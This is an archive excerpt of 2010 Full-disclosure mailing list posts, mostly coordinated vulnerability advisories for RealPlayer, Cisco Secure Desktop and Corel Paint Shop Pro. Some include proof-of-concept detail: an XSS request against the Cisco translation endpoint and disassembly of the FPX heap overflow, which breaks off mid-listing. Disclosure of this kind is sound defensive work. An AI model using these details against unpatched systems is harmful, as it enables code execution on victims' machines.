2010.0/x86_64/hsfmodem-kernel-2.6.31.12-server-1mnb-7.80.02.05-1mdv2010.0.x86_64.rpm 9868d01278210410dbcbc611a90119ce 2010.0/x86_64/hsfmodem-kernel-desktop-latest-7.80.02.05-1.20100126.1mdv2010.0.x86_64.rpm 751404930f974190465a4c4a50044de5 2010.0/x86_64/hsfmodem-kernel-server-latest-7.80.02.05-1.20100126.1mdv2010.0.x86_64.rpm 08b599882c44d33a99988538fb609b38 2010.0/x86_64/kernel-2.6.31.12-1mnb-1-1mnb2.x86_64.rpm 2cf75ab14efefed309450f581d57087b 2010.0/x86_64/kernel-desktop-2.6.31.12-1mnb-1-1mnb2.x86_64.rpm 6f5e5e374f567765eb5fe98dd45e7695 2010.0/x86_64/kernel-desktop-devel-2.6.31.12-1mnb-1-1mnb2.x86_64.rpm b7972f8aca4949cc35be1f98a2a951a1 2010.0/x86_64/kernel-desktop-devel-latest-2.6.31.12-1mnb2.x86_64.rpm 4b6e4a83553ff35eb1c17f93243702aa 2010.0/x86_64/kernel-desktop-latest-2.6.31.12-1mnb2.x86_64.rpm 7e75ac52982f890664675c2fd65685b5 2010.0/x86_64/kernel-doc-2.6.31.12-1mnb2.x86_64.rpm 65f371f2f3bd4f93ab53ecea26248a16 2010.0/x86_64/kernel-server-2.6.31.12-1mnb-1-1mnb2.x86_64.rpm 2301935a2b7fb210f6aa30663884f95d 2010.0/x86_64/kernel-server-devel-2.6.31.12-1mnb-1-1mnb2.x86_64.rpm 4ae81ce5ac17ec0c91d405d98cf9243f 2010.0/x86_64/kernel-server-devel-latest-2.6.31.12-1mnb2.x86_64.rpm bb32733b292499a936bb26ba1daffb6f 2010.0/x86_64/kernel-server-latest-2.6.31.12-1mnb2.x86_64.rpm e08ad8e41d7459d001de5a782359c276 2010.0/x86_64/kernel-source-2.6.31.12-1mnb-1-1mnb2.x86_64.rpm 741fb5bf565334a269ba5356f080bb97 2010.0/x86_64/kernel-source-latest-2.6.31.12-1mnb2.x86_64.rpm 4f9ded4aa7b23c3dc45aa70f28a24e62 2010.0/x86_64/libafs-kernel-2.6.31.12-desktop-1mnb-1.4.11-2mdv2010.0.x86_64.rpm 178d898800c9802b96f5e31e3f7964c6 2010.0/x86_64/libafs-kernel-2.6.31.12-server-1mnb-1.4.11-2mdv2010.0.x86_64.rpm 61defc2af10210a501544d80c51f4c50 2010.0/x86_64/libafs-kernel-desktop-latest-1.4.11-1.20100126.2mdv2010.0.x86_64.rpm 5b27ae169f228b8eb8ea95cbbd3e4e87 2010.0/x86_64/libafs-kernel-server-latest-1.4.11-1.20100126.2mdv2010.0.x86_64.rpm 636cb1935b5813f42e1b4cbcb34cffed 2010.0/x86_64/lirc-kernel-2.6.31.12-desktop-1mnb-0.8.6-2mdv2010.0.x86_64.rpm 2fa53e73d97e8a97b5896e2659390d14 2010.0/x86_64/lirc-kernel-2.6.31.12-server-1mnb-0.8.6-2mdv2010.0.x86_64.rpm 8914d8e0040953e91c7a5d7e88946e26 2010.0/x86_64/lirc-kernel-desktop-latest-0.8.6-1.20100126.2mdv2010.0.x86_64.rpm ec2b1c6a441bd80d8e696060bf9cc3ef 2010.0/x86_64/lirc-kernel-server-latest-0.8.6-1.20100126.2mdv2010.0.x86_64.rpm bdca8c3d4b9078b46647ec9d1a57825d 2010.0/x86_64/lzma-kernel-2.6.31.12-desktop-1mnb-4.43-28mdv2010.0.x86_64.rpm 76e03bf05245bdb4dd82f341de02186d 2010.0/x86_64/lzma-kernel-2.6.31.12-server-1mnb-4.43-28mdv2010.0.x86_64.rpm 8b47fe17352316b92b6af064371fc334 2010.0/x86_64/lzma-kernel-desktop-latest-4.43-1.20100126.28mdv2010.0.x86_64.rpm d9cedb221864039e1a323a50403d6e16 2010.0/x86_64/lzma-kernel-server-latest-4.43-1.20100126.28mdv2010.0.x86_64.rpm 09bb8f79b4013b850209bee20c9d102c 2010.0/x86_64/madwifi-kernel-2.6.31.12-desktop-1mnb-0.9.4-4.r4068mdv2010.0.x86_64.rpm 60f3d5569e979d7b01703ac7efd7af6d 2010.0/x86_64/madwifi-kernel-2.6.31.12-server-1mnb-0.9.4-4.r4068mdv2010.0.x86_64.rpm 089d0eec6dd06ddec3a2b2ea9d8aeb99 2010.0/x86_64/madwifi-kernel-desktop-latest-0.9.4-1.20100126.4.r4068mdv2010.0.x86_64.rpm c3c4bc010c6569781a7a64b6d847e9be 2010.0/x86_64/madwifi-kernel-server-latest-0.9.4-1.20100126.4.r4068mdv2010.0.x86_64.rpm 6a20e1bad45c8c1de5be94eb7c7efeff 2010.0/x86_64/nvidia173-kernel-2.6.31.12-desktop-1mnb-173.14.20-7mdv2010.0.x86_64.rpm 745dcc06850f56a3db49f9a59d55c883 2010.0/x86_64/nvidia173-kernel-2.6.31.12-server-1mnb-173.14.20-7mdv2010.0.x86_64.rpm 779685fe02ff4152f76d529f4c5aae16 2010.0/x86_64/nvidia173-kernel-desktop-latest-173.14.20-1.20100126.7mdv2010.0.x86_64.rpm e76ea6235a5c547eb589e4e330847b87 2010.0/x86_64/nvidia173-kernel-server-latest-173.14.20-1.20100126.7mdv2010.0.x86_64.rpm 2bca03e570477b24cde3b18f5985529b 2010.0/x86_64/nvidia96xx-kernel-2.6.31.12-desktop-1mnb-96.43.13-7mdv2010.0.x86_64.rpm b7d3bc60d2765b615c16693714ed9de8 2010.0/x86_64/nvidia96xx-kernel-2.6.31.12-server-1mnb-96.43.13-7mdv2010.0.x86_64.rpm 2b60c7e4bc5e65147033db88268a0170 2010.0/x86_64/nvidia96xx-kernel-desktop-latest-96.43.13-1.20100126.7mdv2010.0.x86_64.rpm 42de8a8bce871d0f8a12ec00598a5d25 2010.0/x86_64/nvidia96xx-kernel-server-latest-96.43.13-1.20100126.7mdv2010.0.x86_64.rpm cc8c069b5c1cfda0ff4651ae23f788f5 2010.0/x86_64/nvidia-current-kernel-2.6.31.12-desktop-1mnb-185.18.36-4mdv2010.0.x86_64.rpm d6d1dad7413a3af4c41977416319912a 2010.0/x86_64/nvidia-current-kernel-2.6.31.12-server-1mnb-185.18.36-4mdv2010.0.x86_64.rpm 45308d697f192f5d882dcad232842fb5 2010.0/x86_64/nvidia-current-kernel-desktop-latest-185.18.36-1.20100126.4mdv2010.0.x86_64.rpm 2de8a8a6a1d8209d306effc19392f566 2010.0/x86_64/nvidia-current-kernel-server-latest-185.18.36-1.20100126.4mdv2010.0.x86_64.rpm 1f2e6d7fdcfb8aa757cf01938af0f6cc 2010.0/x86_64/squashfs-lzma-kernel-2.6.31.12-desktop-1mnb-3.3-11mdv2010.0.x86_64.rpm 494a8c422299ac60030a445aa4b98551 2010.0/x86_64/squashfs-lzma-kernel-2.6.31.12-server-1mnb-3.3-11mdv2010.0.x86_64.rpm 853693298f7ecf4048b059bca85001b8 2010.0/x86_64/squashfs-lzma-kernel-desktop-latest-3.3-1.20100126.11mdv2010.0.x86_64.rpm 72e8af1b5f59da6f131431ccfc3fbefc 2010.0/x86_64/squashfs-lzma-kernel-server-latest-3.3-1.20100126.11mdv2010.0.x86_64.rpm 11553da4ed0aa18e488758d522d8489e 2010.0/x86_64/vboxadditions-kernel-2.6.31.12-desktop-1mnb-3.0.8-1mdv2010.0.x86_64.rpm 70d65ef17f845723a27fd681b379dbdd 2010.0/x86_64/vboxadditions-kernel-2.6.31.12-server-1mnb-3.0.8-1mdv2010.0.x86_64.rpm d7dd5cc4433be99a3f031220edccdb9d 2010.0/x86_64/vboxadditions-kernel-desktop-latest-3.0.8-1.20100126.1mdv2010.0.x86_64.rpm 115820fd3f9ab1955ed3315f344c698c 2010.0/x86_64/vboxadditions-kernel-server-latest-3.0.8-1.20100126.1mdv2010.0.x86_64.rpm 47aee1817906ccdc3c506dfbed0fd900 2010.0/x86_64/virtualbox-kernel-2.6.31.12-desktop-1mnb-3.0.8-1mdv2010.0.x86_64.rpm 02912c3196333ee0f60cf493050c762c 2010.0/x86_64/virtualbox-kernel-2.6.31.12-server-1mnb-3.0.8-1mdv2010.0.x86_64.rpm d52e6366984653d74e30e016c5b2f3b7 2010.0/x86_64/virtualbox-kernel-desktop-latest-3.0.8-1.20100126.1mdv2010.0.x86_64.rpm 6c42a2ee6692ac5629134d90162057d4 2010.0/x86_64/virtualbox-kernel-server-latest-3.0.8-1.20100126.1mdv2010.0.x86_64.rpm 8184ee149bfa4606b294302d60fc46f6 2010.0/SRPMS/kernel-2.6.31.12-1mnb2.src.rpm _______________________________________________________________________ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com _______________________________________________________________________ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (GNU/Linux) iD8DBQFLZuuKmqjQ0CJFipgRAoJVAJ9byf8b4xEiMyj1UGIKzQ6qXMte/QCfftGn fnBooJggAs1+l3jgZYw8Rrg= =TYSv -----END PGP SIGNATURE----- From infotek at gmail.com Mon Feb 1 18:32:20 2010 From: infotek at gmail.com (Jason Ellison) Date: Mon, 1 Feb 2010 12:32:20 -0600 Subject: [Full-disclosure] Seagate Black Armor security issue Message-ID: List, I found a security issue on a Seagate Black Armor 440 NAS. I'm looking for a PoC at Seagate to discuss this issue. Jason Ellison From labs-no-reply at idefense.com Mon Feb 1 19:20:24 2010 From: labs-no-reply at idefense.com (iDefense Labs) Date: Mon, 01 Feb 2010 14:20:24 -0500 Subject: [Full-disclosure] iDefense Security Advisory 02.01.10: RealNetworks RealPlayer 11 HTTP Chunked Encoding Integer Overflow Vulnerability Message-ID: <4B672978.4030209@idefense.com> iDefense Security Advisory 02.01.10 http://labs.idefense.com/intelligence/vulnerabilities/ Feb 01, 2010 I. BACKGROUND RealPlayer is an application for playing various media formats, developed by RealNetworks Inc. Since late 2003, Real Player has been based on the open-source Helix Player. More information can be found at the URLs shown. For more information, see the vendor's site found at the following link. http://www.real.com/realplayer.html http://helixcommunity.org/ II. DESCRIPTION Remote exploitation of an integer overflow vulnerability in RealNetworks Inc.'s RealPlayer 11 could allow an attacker to execute arbitrary code with the privileges of the affected service. The vulnerability specifically exists in the handling of the 'chunked' Transfer-Encoding method. This method breaks the file the server is sending into 'chunks'. For each chunk, the server first sends the length of the chunk in hexadecimal, followed by the chunk data. This is repeated until there are no more chunks. The server then sends a chunk length of zero (0) indicating the end of the transfer. When processing these chunks, an integer overflow occurs, which results in a heap overflow. This leads to the execution of arbitrary code. III. ANALYSIS Exploitation of this vulnerability results in the execution of arbitrary code with the privileges of the user executing Real Player. To be successful, an attacker must persuade a user to use Real Player to view specially crafted media. This could be accomplished via a Web page using the RealPlayer plug-in or a direct link to the malicious media. It appears that the RealPlayer plug-in for Firefox uses the browser to download files via HTTP. The RealPlayer chunked encoding processing is not used in this scenario. However, RealPlayer does provide a right-click context menu to open the document within RealPlayer itself. As such, using Firefox does not prevent exploitation altogether. IV. DETECTION iDefense has confirmed the existence of this vulnerability in RealPlayer version 11 on Windows. A nightly build of RealPlayer 10.1.0.3830 for Linux was also confirmed to be vulnerable. Previous versions do not appear be affected. V. WORKAROUND iDefense is currently unaware of any workarounds for this issue. VI. VENDOR RESPONSE RealNetworks has released a patch which addresses this issue. Information about downloadable vendor updates can be found by clicking on the URLs shown. http://service.real.com/realplayer/security/01192010_player/en/ VII. CVE INFORMATION The Common Vulnerabilities and Exposures (CVE) project has assigned the name CVE-2009-4243 to this issue. This is a candidate for inclusion in the CVE list (http://cve.mitre.org/), which standardizes names for security problems. VIII. DISCLOSURE TIMELINE 01/11/2008 Initial Contact 01/11/2009 Initial Response 02/01/2010 Coordinated public disclosure. IX. CREDIT The discoverer of this vulnerability wishes to remain anonymous. Get paid for vulnerability research http://labs.idefense.com/methodology/vulnerability/vcp.php Free tools, research and upcoming events http://labs.idefense.com/ X. LEGAL NOTICES Copyright ? 2010 iDefense, Inc. Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without the express written consent of iDefense. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please e-mail customerservice at idefense.com for permission. Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information. From advisories at coresecurity.com Mon Feb 1 19:46:41 2010 From: advisories at coresecurity.com (Core Security Technologies Advisories) Date: Mon, 01 Feb 2010 16:46:41 -0300 Subject: [Full-disclosure] [CORE-2010-0106] Cisco Secure Desktop XSS/JavaScript Injection Message-ID: <4B672FA1.7080204@coresecurity.com> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Core Security Technologies - CoreLabs Advisory http://www.coresecurity.com/corelabs/ Cisco Secure Desktop XSS/JavaScript Injection 1. *Advisory Information* Title: Cisco Secure Desktop XSS/JavaScript Injection Advisory Id: CORE-2010-0106 Advisory URL: http://www.coresecurity.com/content/cisco-secure-desktop-xss Date published: 2010-02-01 Date of last update: 2010-02-01 Vendors contacted: Cisco Release mode: Coordinated release 2. *Vulnerability Information* Class: Cross site scripting [CWE-79] Impact: Code execution Remotely Exploitable: Yes Locally Exploitable: No Bugtraq ID: 37960 CVE Name: CVE-2010-0440 3. *Vulnerability Description* The Cisco Secure Desktop web application does not sufficiently verify if a well-formed request was provided by the user who submitted the POST request, resulting in a cross-site scripting vulnerability. In order to be able to sucessfully make the attack, the Secure Desktop application on the Cisco Appliance must be turned on. 4. *Vulnerable packages* . Cisco Secure Desktop 3.4.2048 . Older versions are probably affected too, but they were not checked. 5. *Non-vulnerable packages* . Cisco Secure Desktop 3.5.841 6. *Vendor Information, Solutions and Workarounds* Cisco Security Alert: http://tools.cisco.com/security/center/viewAlert.x?alertId=19843 7. *Credits* This vulnerability was discovered and researched by Matias Pablo Brutti from Core Security Technologies. The publication of this advisory was coordinated by Jorge Lucangeli Obes from Core Security Technologies Advisories Team. 8. *Technical Description / Proof of Concept Code* Cross-site scripting (XSS) vulnerabilities allow an attacker to execute arbitrary scripting code in the context of the user browser (in the vulnerable application's domain). For example, an attacker could exploit an XSS vulnerability to steal user cookies (and then impersonate the legitimate user) or fake a page requesting information to the user (i.e.: credentials). This vulnerability occurs when user-supplied data is displayed without encoding. The Cisco Secure Desktop web application does not sufficiently verify if a well-formed request was provided by the user who submitted the POST request. The cross-site scripting vulnerability was found in the following file/url: /----- https://{IP}//+CSCOT+/translation?textdomain=csd&prefix=trans&lang=en-us - -----/ Using the POST variable: /----- Starting, please wait..."> - -----/ The content of the POST field is not being encoded at the time of using them in HTML output, therefore allowing an attacker who controls their content to insert JavaScript code. Furthermore, we could possibly inject JavaScript code into the 'start.html' page because the content of the previously mentioned POST is used in 'binary/mainv.js' as input for an 'eval()' function, hence allowing an attacker to inject any code without restrictions which will be executed in the context of the 'eval()' function: /----- 282 http_request.open('POST', path, false); 283 http_request.send(msgs); 284 var trans = new Array(); 285 try { 286 eval(http_request.responseText); 287 } catch (e) {} - -----/ 8.1. *Proof of Concept* /----- REQUEST: POST https://{IP}/+CSCOT+/translation?textdomain=csd&prefix=trans&lang=en-us HTTP/1.1 Host: {IP} User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/2008052906 Firefox/3.0 (.NET CLR 3.5.30729) Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Connection: keep-alive Referer: https://{IP}/CACHE/sdesktop/install/start.htm Content-Type: application/xml; charset=UTF-8 Cookie: webvpnLang=en-us; webvpnlogin=1 Pragma: no-cache Cache-Control: no-cache Content-Length: 56 Starting, please wait..."> RESPONSE: HTTP/1.1 200 OK Server: Cisco AWARE 2.0 Content-Type: text/html; charset=UTF-8 Cache-Control: no-cache Pragma: no-cache Connection: Keep-Alive Date: Mon, 16 Nov 2009 14:14:07 GMT Content-Length: 122 trans["Starting, please wait...\">"] = "Starting, please wait...\">"; - -----/ 9. *Report Timeline* . 2010-01-12: Vendor contacted. . 2010-01-12: Cisco replies, saying that it will investigate the report. . 2010-01-12: Cisco tentatively acknowledges the February 5th release date. . 2010-01-13: Core replies, reassuring that the release date can be moved if Cisco can't meet it. . 2010-01-13: Cisco updates, pointing to a beta version of Cisco Secure Desktop that contains a fix for the vulnerability. . 2010-01-13: Cisco describes the fix and the non-vulnerable versions of the package. . 2010-01-14: Cisco confirms the February 5th release date. . 2010-01-14: Core acknowledges this release date. . 2010-01-25: Core asks for clarification on the non-vulnerable versions of the package. . 2010-01-25: Cisco replies with the non-vulnerable version of Cisco Secure Desktop. . 2010-01-26: Given that the non-vulnerable version of Cisco Secure Desktop has already been released, Core requests to move the release date forward, to February 1st. . 2010-01-26: Cisco agrees to move the release date forward. . 2010-02-01: The advisory CORE-2010-0106 is published. 10. *About CoreLabs* CoreLabs, the research center of Core Security Technologies, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://www.coresecurity.com/corelabs. 11. *About Core Security Technologies* Core Security Technologies develops strategic solutions that help security-conscious organizations worldwide develop and maintain a proactive process for securing their networks. The company's flagship product, CORE IMPACT, is the most comprehensive product for performing enterprise security assurance testing. CORE IMPACT evaluates network, endpoint and end-user vulnerabilities and identifies what resources are exposed. It enables organizations to determine if current security investments are detecting and preventing attacks. Core Security Technologies augments its leading technology solution with world-class security consulting services, including penetration testing and software security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core Security Technologies can be reached at 617-399-6980 or on the Web at http://www.coresecurity.com. 12. *Disclaimer* The contents of this advisory are copyright (c) 2010 Core Security Technologies and (c) 2010 CoreLabs, and may be distributed freely provided that no fee is charged for this distribution and proper credit is given. 13. *PGP/GPG Keys* This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.6 (GNU/Linux) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iD8DBQFLZy9lyNibggitWa0RAgTRAJ4lKTa+knGNpaqk+RwUe26bQEJBIwCeOrL1 B1t5rEq+DQYMZvLTaVhyDio= =g4gM -----END PGP SIGNATURE----- From labs-no-reply at idefense.com Mon Feb 1 20:13:42 2010 From: labs-no-reply at idefense.com (iDefense Labs) Date: Mon, 01 Feb 2010 15:13:42 -0500 Subject: [Full-disclosure] iDefense Security Advisory 02.01.10: RealNetworks RealPlayer CMediumBlockAllocator Integer Overflow Vulnerability Message-ID: <4B6735F6.9060305@idefense.com> iDefense Security Advisory 02.01.10 http://labs.idefense.com/intelligence/vulnerabilities/ Feb 01, 2010 I. BACKGROUND RealPlayer is an application for playing various media formats, developed by RealNetworks Inc. Since late 2003, Real Player has been based on the open-source Helix Player. More information can be found at the URLs shown. For more information, see the vendor's site found at the following links. http://www.real.com/realplayer.html http://helixcommunity.org/ II. DESCRIPTION Remote exploitation of an integer overflow vulnerability in RealNetworks Inc.'s Real Player could allow an attacker to execute arbitrary code with the privileges of the current user. This problem specifically exists in the CMediumBlockAllocator::Alloc method. When calculating the size of a memory allocation, an integer overflow occurs. This leads to heap corruption, which can result in the execution of arbitrary code. III. ANALYSIS Exploitation of this vulnerability results in the execution of arbitrary code with the privileges of the user executing Real Player. To be successful, an attacker must persuade a user to use Real Player to view specially crafted media. This could be accomplished via a Web page or direct link to the malicious media. IV. DETECTION iDefense has confirmed the existence of this vulnerability in Real Player versions 10.5 (build 6.0.12.883) and 11 (build 6.0.14.738) on Windows. Other versions may also be affected. RealNetworks has provided the following matrix of vulnerable products: Windows RealPlayer 11.0.0 - 11.0.4 Windows RealPlayer 10.5 (6.0.12.1040-6.0.12.1663, 6.0.12.1698, 6.0.12.1741) Mac RealPlayer 10 Linux RP10 V. WORKAROUND iDefense is currently unaware of any effective workaround for this issue. VI. VENDOR RESPONSE RealNetworks has released a patch which addresses this issue. Information about downloadable vendor updates can be found by clicking on the URLs shown. http://service.real.com/realplayer/security/01192010_player/en/ VII. CVE INFORMATION The Common Vulnerabilities and Exposures (CVE) project has assigned the name CVE-2009-4248 to this issue. This is a candidate for inclusion in the CVE list (http://cve.mitre.org/), which standardizes names for security problems. VIII. DISCLOSURE TIMELINE 01/11/2008 Initial Contact 01/11/2009 Initial Response 02/01/2010 Coordinated public disclosure. IX. CREDIT The discoverer of this vulnerability wishes to remain anonymous. Get paid for vulnerability research http://labs.idefense.com/methodology/vulnerability/vcp.php Free tools, research and upcoming events http://labs.idefense.com/ X. LEGAL NOTICES Copyright ? 2010 iDefense, Inc. Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without the express written consent of iDefense. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please e-mail customerservice at idefense.com for permission. Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information. From labs-no-reply at idefense.com Mon Feb 1 20:23:22 2010 From: labs-no-reply at idefense.com (iDefense Labs) Date: Mon, 01 Feb 2010 15:23:22 -0500 Subject: [Full-disclosure] iDefense Security Advisory 02.01.10: Real Networks RealPlayer Compressed GIF Handling Integer Overflow Message-ID: <4B67383A.5040108@idefense.com> iDefense Security Advisory 02.01.10 http://labs.idefense.com/intelligence/vulnerabilities/ Feb 01, 2010 I. BACKGROUND RealPlayer is an application for playing various media formats, developed by RealNetworks Inc. Since late 2003, Real Player has been based on the open-source Helix Player. More information can be found at the URLs shown. For more information, see the vendor's site found at the following links. http://www.real.com/realplayer.html http://helixcommunity.org/ II. DESCRIPTION Remote exploitation of an integer overflow vulnerability in Real Networks Inc.'s RealPlayer version 11 could allow an attacker to execute arbitrary code. iDefense Labs has confirmed the existence of an integer overflow issue within RealPlayer when handling compressed GIF files. The vulnerability occurs in the CGIFCodec::InitDecompress() function, which does not properly validate a field in the GIF file before using it in an arithmetic operation that calculates the size of a heap buffer. This issue leads to heap corruption, which can result in the execution of arbitrary code. III. ANALYSIS Exploitation of this issue allows an attacker to execute arbitrary code within the security context of the current user. An attacker would need to entice a victim into opening a RTSP stream. Upon the victim opening the stream, the attack would inject a malformed compressed GIF image into a RTSP stream to exploit this issue. Other attack vectors are likely to exist; however, this was the vector tested within iDefense Labs. It should be noted that RealPlayer can be instantiated within a Web browser. This means an attacker could host a malicious Web page and entice a victim into visiting this page. Upon visiting the page, exploitation would occur. IV. DETECTION iDefense confirmed RealPlayer version 11 is vulnerable to this issue. RealNetworks provided the following matrix of affected software: Windows RealPlayer 11.0.0 - 11.0.4 Mac RealPlayer 10 V. WORKAROUND iDefense recommends applying the following workarounds until a patch resolving this issue is made publicly available by Real Networks Inc. RealPlayer users should change the GIF filetype association to another application. It is also recommended that RealPlayer users disable the RealPlayer plugins contained within the Web browsers plugins directory by changing the file permissions to deny execution of these files. These workarounds will limit the functionality of RealPlayer by disabling GIF support and web browser plugin features. These workarounds may not mitigate all exploitation vectors but will likely prevent the majority of likely scenarios. VI. VENDOR RESPONSE RealNetworks has released a patch which addresses this issue. Information about downloadable vendor updates can be found by clicking on the URLs shown. http://service.real.com/realplayer/security/01192010_player/en/ VII. CVE INFORMATION The Common Vulnerabilities and Exposures (CVE) project has assigned the name CVE-2009-4245 to this issue. This is a candidate for inclusion in the CVE list (http://cve.mitre.org/), which standardizes names for security problems. VIII. DISCLOSURE TIMELINE 05/13/2008 Initial Contact 05/03/2008 Initial Response 02/01/2010 Coordinated public disclosure. IX. CREDIT The discoverer of this vulnerability wishes to remain anonymous. Get paid for vulnerability research http://labs.idefense.com/methodology/vulnerability/vcp.php Free tools, research and upcoming events http://labs.idefense.com/ X. LEGAL NOTICES Copyright ? 2010 iDefense, Inc. Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without the express written consent of iDefense. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please e-mail customerservice at idefense.com for permission. Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information. From advisories at coresecurity.com Mon Feb 1 20:48:41 2010 From: advisories at coresecurity.com (CORE Security Technologies Advisories) Date: Mon, 01 Feb 2010 17:48:41 -0300 Subject: [Full-disclosure] [CORE-2009-1126] Corel Paint Shop Pro Photo X2 FPX Heap Overflow Message-ID: <4B673E29.1030108@coresecurity.com> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Core Security Technologies - CoreLabs Advisory http://www.coresecurity.com/corelabs/ Corel Paint Shop Pro Photo X2 FPX Heap Overflow 1. *Advisory Information* Title: Corel Paint Shop Pro Photo X2 FPX Heap Overflow Advisory Id: CORE-2009-1126 Advisory URL: http://www.coresecurity.com/content/corel-paintshop-heap-overflow Date published: 2010-02-01 Date of last update: 2010-02-01 Vendors contacted: Corel Release mode: User release 2. *Vulnerability Information* Class: Heap-based Buffer Overflow [CWE-119] Impact: Code execution Remotely Exploitable: Yes (client-side) Locally Exploitable: No Bugtraq ID: 37980 CVE Name: N/A 3. *Vulnerability Description* Corel Paint Shop Pro Photo X2 [2] is a professional image editing software, that allows users to edit photos, create graphics, draw and paint. Corel Paint Shop Pro Photo X2 is prone to a heap-based buffer overflow when processing malformed FPX files, because it trusts user-controlled data located inside a FPX file and uses it as a loop counter when copying data from a FPX file into a fixed-size buffer located in the heap. This vulnerability can be exploited to overwrite adjacent heap chunks metadata, and possibly to gain arbitrary code execution. 4. *Vulnerable packages* . Corel Paint Shop Pro Photo X2 Ultimate 12.50 . Older versions are probably affected too, but they were not checked. 5. *Vendor Information, Solutions and Workarounds* The vendor did not provide fixes or workaround information. To prevent an accidental trigger of the vulnerability, you can disable the 'Preview' feature that exists in the 'File/Open' dialog. Furthermore, avoid opening FPX files coming from untrusted sources. 6. *Credits* This vulnerability was discovered and researched by Francisco Falcon from Core Security Technologies during Bugweek 2009 [1]. The publication of this advisory was coordinated by Carlos Sarraute from Core Security Advisories team. 7. *Technical Description / Proof of Concept Code* Corel Paint Shop Pro Photo X2 is prone to a heap-based buffer overflow when processing malformed FPX files, because it trusts user-controlled data located inside a FPX file and uses it as a loop counter when copying data from a FPX file into a fixed-size buffer located in the heap. This vulnerability can be exploited to overwrite adjacent heap chunks metadata, and possibly to gain arbitrary code execution (though it does not seem easy). When processing certain structures from a FPX file, Corel Paint Shop Pro Photo X2 allocates fixed-size (0xC08 bytes) buffers, and copies data from the FPX file to that buffer. But the application trusts certain bytes from the FPX file and uses them as loop counters for the copy operation, without properly verifying that these bytes have legal values. If those user-controlled bytes used as counters have large values, the buffer overflow will be triggered. First of all, the application allocates a 0xC08-bytes long buffer, by calling 'malloc()' with a constant value: /----- [Module: JPEGACC.dll] 095F4D97 |. 68 080C0000 PUSH 0C08 ;size of the buffer to be allocated 095F4D9C |. E8 9F4D0000 CALL JPEGACC.095F9B40 ;call to malloc() 095F4DA1 |. 83C4 04 ADD ESP,4 095F4DA4 |. 894424 10 MOV DWORD PTR SS:[ESP+10],EAX ;saves the pointer returned by malloc() - -----/ After that, it starts copying data from the FPX file to the recently allocated buffer. As we can see in the following disassembled code excerpt, the byte located at the offset 0x1406 in the FPX file provided as a proof-of-concept with this advisory is interpreted as the loop counter for the inner loop, thus determining how many times the copy operation will be called. The copy operation is performed inside the call to address 09264C50. The data that is copied into the buffer is partially fetched from the FPX file too, starting from offset 0x1416. /----- [Module: JPEGACC.dll] 09264DD2 |> 8B6C24 24 /MOV EBP,DWORD PTR SS:[ESP+24] 09264DD6 |. 33D2 |XOR EDX,EDX 09264DD8 |. 8A55 00 |MOV DL,BYTE PTR SS:[EBP] ; byte at offset 0x1406 in the FPX file (user controlled) 09264DDB |. 45 |INC EBP 09264DDC |. 8BFA |MOV EDI,EDX ; EDI=inner loop counter, byte at offset 0x1406 (user controlled) 09264DDE |. 896C24 24 |MOV DWORD PTR SS:[ESP+24],EBP 09264DE2 |. 85FF |TEST EDI,EDI 09264DE4 |. 74 28 |JE SHORT JPEGACC.09264E0E 09264DE6 |. 7E 26 |JLE SHORT JPEGACC.09264E0E 09264DE8 |. 8D68 08 |LEA EBP,DWORD PTR DS:[EAX+8] 09264DEB |> 8B5424 28 |/MOV EDX,DWORD PTR SS:[ESP+28] ; EDX starts pointing to offset 0x1416 of the FPX file 09264DEF |. 33C0 ||XOR EAX,EAX 09264DF1 |. 8BCE ||MOV ECX,ESI 09264DF3 |. 55 ||PUSH EBP 09264DF4 |. 8A02 ||MOV AL,BYTE PTR DS:[EDX] ; reads bytes starting from offset 0x1416 (user controlled) 09264DF6 |. 46 ||INC ESI 09264DF7 |. 53 ||PUSH EBX 09264DF8 |. 42 ||INC EDX 09264DF9 |. 50 ||PUSH EAX 09264DFA |. 51 ||PUSH ECX 09264DFB |. 895424 38 ||MOV DWORD PTR SS:[ESP+38],EDX 09264DFF |. E8 4CFEFFFF ||CALL JPEGACC.09264C50 ; copies user-controlled data to the buffer 09264E04 |. 83C4 10 ||ADD 